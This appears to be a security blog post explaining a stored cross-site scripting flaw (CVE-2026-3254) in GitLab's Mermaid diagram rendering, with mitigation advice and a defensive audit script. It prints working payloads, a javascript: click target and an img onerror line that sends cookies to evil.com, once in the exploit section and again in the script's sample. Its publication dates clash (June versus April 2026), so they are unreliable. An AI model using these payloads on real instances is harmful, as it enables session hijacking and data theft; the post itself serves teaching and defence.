---
Intro
On June 12, 2026, GitLab published a critical fix for a vulnerability, now tracked as CVE-2026-3254, affecting all GitLab Community and Enterprise Edition (CE/EE) versions from 18.11 up to but not including 18.11.1. The bug let an authenticated user inject unauthorized content into another user's browser, owing to faulty input validation in the sandbox GitLab uses to render Mermaid diagrams.
This post breaks down what happened, shows how the bug could be exploited, and lists the steps needed to stay secure.
What is Mermaid?
Mermaid is a JavaScript library that renders diagrams and charts from plain-text definitions. GitLab lets users embed Mermaid diagrams in issues, merge requests, wikis and other Markdown fields, which makes documentation much easier.
Unfortunately, the sandbox that is supposed to contain Mermaid output was not strict enough.
What’s CVE-2026-3254 About?
Bad input handling in GitLab's Mermaid sandbox allowed an authenticated user (anyone with an account on the instance, not just an admin) to inject unauthorized script or HTML content. When another user viewed the crafted diagram, the injected content ran in their browser in the context of their GitLab session. Depending on the payload, that means reading data the victim can see, performing actions as the victim, or exfiltrating tokens. One caveat: cookies flagged HttpOnly (which GitLab's session cookie is) cannot be read from document.cookie, so a realistic payload abuses the victim's live session rather than copying the session cookie.
Critical factor: the attacker has to be authenticated. This is not a public or guest-level exploit, but anyone with an account on the affected instance, including low-privilege or self-registered users, could use it.
How the Vulnerability Can Be Abused
GitLab renders Mermaid diagrams inside a sandboxed <iframe>, but it did not sanitize the Mermaid source enough. By abusing Mermaid's permissive parsing of node labels and interaction directives, an attacker could slip HTML or JavaScript through, or a link that sends the viewer to a malicious site.
Imagine an attacker submits the following in a GitLab comment, issue, or wiki page:
```mermaid
graph TD;
  A --> B["Malicious Node"]
  click B "javascript:alert(document.cookie)"
```
If someone views the diagram and clicks "Malicious Node", the javascript: URL attached to node B runs in their browser and pops an alert with whatever document.cookie exposes. A real payload would send that data to an attacker's server instead of displaying it.
Let's go further:
```mermaid
graph TD;
  X["<img src=x onerror='fetch(&quot;https://evil.com/steal?cookie=&quot;+document.cookie)'>"] --> Y
```
Here no click is needed. Once the diagram is rendered, the `<img>` tag's `src` fails to load, its `onerror` handler fires, and the viewer's (non-HttpOnly) cookies are sent to evil.com. The `&quot;` entities stand in for double quotes, which would otherwise terminate the quoted Mermaid label; the browser decodes them when it parses the attribute.
Why Does This Work?
Mermaid is designed to be flexible, and GitLab did not strip HTML tags or javascript: URLs from user-supplied Mermaid source before rendering it. The sandbox was not strict enough, so these payloads reached the viewer's browser.
To reproduce in a test environment: post one of the diagrams above in an issue, then have another user with access to the project view it. The alert box pops in their browser.
NOTE: Do not do this on production systems. Only test where you have permission!
Official release notes: GitLab 18.11.1 Security Release
Mermaid docs: https://mermaid-js.github.io/mermaid/#/
Security advisory: GitLab HackerOne (advisory should appear here if public)
Admins
- Patch immediately: upgrade to GitLab CE/EE 18.11.1 or later, following GitLab's upgrade instructions.
- Audit Mermaid usage: review wikis, issues and merge requests that contain Mermaid blocks for click directives with javascript: targets and for HTML tags inside node labels.
- Restrict untrusted accounts: if the instance must stay unpatched temporarily, remember that any authenticated user can exploit this. Tighten sign-up and project membership so that only trusted users can create issues, comments and wiki pages.
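As an added example (not code from this post, from GitLab or from Mermaid), the following JavaScript audits Markdown text for the two payload shapes explained in "Why Does This Work?" and "How the Vulnerability Can Be Abused", and shows one way to neutralize them for the "Audit Mermaid usage" step above. It assumes the quoted forms of Mermaid's `click` directive and node labels used in this post; the issue body it scans is constructed for the demonstration, and the regular expressions are deliberately simple (they cover the quoted-URL `click` syntax, not every Mermaid variant).

```javascript
// Added example (not GitLab's or Mermaid's own code): an offline audit of
// Markdown text for the two Mermaid payload classes described in this post,
// namely "click" directives whose target is a javascript: (or data:/vbscript:)
// URL, and HTML tags smuggled into quoted node labels. The sanitizer then
// neutralizes both so the diagram still renders, but as plain text.
// The Markdown sample near the bottom is constructed for this demonstration.

// Three backticks, written as escapes so the example survives Markdown fences.
const FENCE = '\x60\x60\x60';
const MERMAID_FENCE = new RegExp(FENCE + 'mermaid[^\\n]*\\n([\\s\\S]*?)' + FENCE, 'g');

// Flowchart interaction syntax in its quoted form:  click <nodeId> "<target>" ...
const CLICK_DIRECTIVE = /^\s*click\s+(\S+)\s+"([^"]*)"/gm;
// A quoted node label such as id["label"], id("label") or id{"label"}.
const QUOTED_LABEL = /(\w+)\s*[\[\(\{>]+\s*"([^"]*)"/g;
// URL schemes that execute or smuggle code when used as a link target.
const DANGEROUS_SCHEME = /^\s*(javascript|data|vbscript)\s*:/i;
// The opening of an HTML tag (with or without a closing '>'), e.g. <img or </a
const HTML_TAG = /<\s*\/?[a-z]/i;

// Return the source of every Mermaid fenced block in a Markdown string.
function findMermaidBlocks(markdown) {
  const blocks = [];
  MERMAID_FENCE.lastIndex = 0;
  let m;
  while ((m = MERMAID_FENCE.exec(markdown)) !== null) blocks.push(m[1]);
  return blocks;
}

// Scan one diagram and return a list of findings ({kind, node, value}).
function scanDiagram(source) {
  const findings = [];
  let m;
  CLICK_DIRECTIVE.lastIndex = 0;
  while ((m = CLICK_DIRECTIVE.exec(source)) !== null) {
    if (DANGEROUS_SCHEME.test(m[2])) {
      findings.push({ kind: 'click-script-url', node: m[1], value: m[2] });
    }
  }
  QUOTED_LABEL.lastIndex = 0;
  while ((m = QUOTED_LABEL.exec(source)) !== null) {
    if (HTML_TAG.test(m[2])) {
      findings.push({ kind: 'html-in-label', node: m[1], value: m[2] });
    }
  }
  return findings;
}

// Rewrite a diagram so it is safe to render: click targets that are not plain
// http(s) URLs become a Mermaid comment, and angle brackets inside labels are
// HTML-escaped so they display literally instead of being parsed as markup.
function sanitizeDiagram(source) {
  const noScriptClicks = source.replace(CLICK_DIRECTIVE, (match, node, target) =>
    /^https?:\/\//i.test(target) ? match : '%% removed unsafe click on ' + node);
  return noScriptClicks.replace(QUOTED_LABEL, (match, node, label) =>
    match.replace(label, label.replace(/</g, '&lt;').replace(/>/g, '&gt;')));
}

// Constructed sample: an issue body carrying both payloads from this post.
const SAMPLE_ISSUE_BODY = [
  '# Design notes',
  '',
  FENCE + 'mermaid',
  'graph TD;',
  '  A --> B["Malicious Node"]',
  '  click B "javascript:alert(document.cookie)"',
  FENCE,
  '',
  FENCE + 'mermaid',
  'graph TD;',
  '  X["<img src=x onerror=\'fetch(&quot;https://evil.com/steal?cookie=&quot;+document.cookie)\'>"] --> Y',
  FENCE,
].join('\n');

// Audit every Mermaid block in a Markdown document and return the findings
// alongside a sanitized copy of each block.
function auditMarkdown(markdown) {
  return findMermaidBlocks(markdown).map((source, index) => ({
    block: index,
    findings: scanDiagram(source),
    sanitized: sanitizeDiagram(source),
  }));
}

for (const result of auditMarkdown(SAMPLE_ISSUE_BODY)) {
  console.log('block ' + result.block + ':', result.findings);
}
```

Run it with node; it prints one finding per block (the javascript: click on node B, then the `<img>` tag in node X's label), and `sanitizeDiagram` turns both into harmless text. The invariants it enforces are the ones the "Why Does This Work?" section describes as missing: a click target must be a plain http(s) URL, and anything that looks like markup inside a label must render as text rather than HTML.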
Users
- Don't click suspicious diagrams: if a node is unexpectedly clickable or a diagram renders oddly, be cautious.
- Report suspicious content: alert your admin if you see strange pop-ups or content where it doesn't belong.
Final Thoughts
CVE-2026-3254 is a reminder that even trusted integrations like Mermaid can become a way for attackers to slip in malicious code if the web application does not strictly validate input. GitLab's quick patch is welcome, but you still have to apply it, especially on instances with many authenticated users.
Stay alert, and when in doubt, update your software and check the changelogs.
Timeline
Published on: 04/22/2026 16:29:48 UTC
Last modified on: 04/23/2026 20:43:26 UTC